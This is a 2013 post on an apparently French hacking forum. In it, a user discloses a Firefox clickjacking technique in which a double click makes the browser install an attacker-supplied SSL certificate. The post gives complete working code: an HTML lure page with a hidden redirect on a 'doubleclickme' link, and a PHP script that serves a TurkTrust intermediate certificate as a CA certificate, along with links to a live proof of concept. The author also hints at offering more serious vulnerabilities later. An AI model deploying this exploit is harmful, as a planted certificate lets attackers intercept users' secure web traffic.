• STATISTIQUES
  • Il y a eu un total de 0 membres et 9918 visiteurs sur le site dans les dernières 24h pour un total de 9 918 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [EN] Big-Daddy
    Big-Daddy est site internet communautaire avec un effectif diversifié, y compris des artistes, des programmeur...
    Hacking
    [EN] Sabre Films
    Site de challenge présenté sous la forme d'une quête. Vous êtes un détective et devrez résoudre d...
    Challenges
    [FR] Secuser
    Actualité de la sécurité informatique, fiches virus et hoax, alertes par email, antivirus gratui...
    Hacking
    [EN] Framework Metasploit
    Le Framework Metasploit est un logiciel gratuit, open source de tests de pénétration développ&ea...
    Vulnérabilités
    [FR] PHP France
    Pour tout savoir sur le PHP, en français. Vous trouverez des tutoriels, des exemples, des astuces, toute la do...
    Hacking
    [FR] frameip
    le site de partage des connaissances du monde TCPIP
    Protocole
    [FR] PHP Débutant
    Apprendre le PHP par l'exemple, facilement et simplement. Réservé d'abord aux débutants....
    Programmation

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Mozilla Firefox Install malicious certificate clickjacking
01-09-2013, 13h49 (Modification du message : 01-09-2013, 13h49 par j0-c.)
Message : #1
j0-c Hors ligne
Newbie
*



Messages : 12
Sujets : 3
Points: 5
Inscription : Jul 2013
Mozilla Firefox Install malicious certificate clickjacking
Video youtube du PoC en action =>

Voila je poste ici une petite vulnérabilité que j'ai dèja signalé sur bugzilla.mozilla.org unpeu plus importante que la dernière, celle ci permet d'installé un certificat SSL et donc même si celui ci est factice ou obsolète, il permet de visiter des site web sécurisé via le même type de certificat.

Le clickjacking consiste a double cliquer sur un lien , au premier clique une boite d'installation de certificat apparaitra et au deuxième clique le certificat sera installé.


Pour l'instant je poste juste des petites failles pour tester la fiabilité du forum , voir si il n'y a pas de personne qui publie ceci à leur nom sur divers autres sites mais si la confiance se fait je vais alors pouvoir vous donner d'avantage de vulnérabilité beaucoup plus importante .
Code PHP :
<!doctype html>
<
html lang="fr">
<
head>
    <
meta charset="utf-8">
    <
title>0day</title>
    <
style media="screen">

    
/* IMPORTANT */
    
html {
        
height100%;
    }
    
body {
        
height100%;
        
margin0;
        
padding0;
    }
    
#page-table {
        
height100%;
        
width100%;
        
border-collapsecollapse;
        
text-aligncenter;
    }
    
#page-td {
        
height100%;
        
padding0;
        
vertical-alignmiddle;
    }
    
div#global {
        
width500px;
        
margin20px auto;
        
text-alignleft;
    }

    
/* COSM�TIQUE */
    
body {
        
backgroundblack;
    }
    
#page-table {
        
backgroundblack;
        
colorwhite;
    }
    
#page-table a {color: white;}
    
div#global {
        
padding10px 20px;
        
backgroundblack;
        
border1px solid black;
        
font-familyArialHelveticasans-serif;
    }


    </
style>
</
head>

<
body>
<
div id="layer1" style="width:442px; height:200px; position:absolute; left:10px; top:56px; z-index:1;">
    <
p><font color="lime">0day exploit double-click-jacking install malicious 
    SSL Certificate
</font></p>
</
div>
<
table id="page-table"><tr><td id="page-td">

<
div id="global">
<
table style="border-collapse:collapse;" cellspacing="0" width="424">
            <
tr>
                <
td width="150" height="119" style="border-width:0; border-color:black; border-style:solid;">
                    <
p>&nbsp;</p>
                </
td>
            </
tr>
            <
tr>
                <
td width="150" height="23" style="border-width:0; border-color:black; border-style:solid;">
                    <
p align="right"><a onmousedown="document.location='./156.php';" href="#"><span style="font-size:8pt;">doubleclickme</span></a></td>
            </
tr>
        </
table>
</
div><!--#global-->

</td></tr></table><!--#page-table-->

</body>
</
html

---
156.php
Code PHP :
<?php
Header
("Content-type: application/x-x509-ca-cert"); //no comment
Header("Content-Disposition: inline; filename=turktrust-intermediate-2.pem"); 
readfile("turktrust-intermediate-2.pem"); 
?>

---
turktrust-intermediate-2.pem
certificate : http://alternativ-testing.fr/Research/Mo...iate-2.pem


Live PoC : http://alternativ-testing.fr/Research/Mo...icate2.htm#
+1 (0) -1 (0) Répondre


Messages dans ce sujet
Mozilla Firefox Install malicious certificate clickjacking - par j0-c - 01-09-2013, 13h49

Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  firefox >= 24 & TLS 1.2 gruik 6 416 07-02-2014, 00h19
Dernier message: Serphentas
  Mozilla Firefox low spoofing possible url spoofing with copy , past and go of a link j0-c 8 596 01-09-2013, 13h54
Dernier message: gruik

Atteindre :


Utilisateur(s) parcourant ce sujet : 3 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut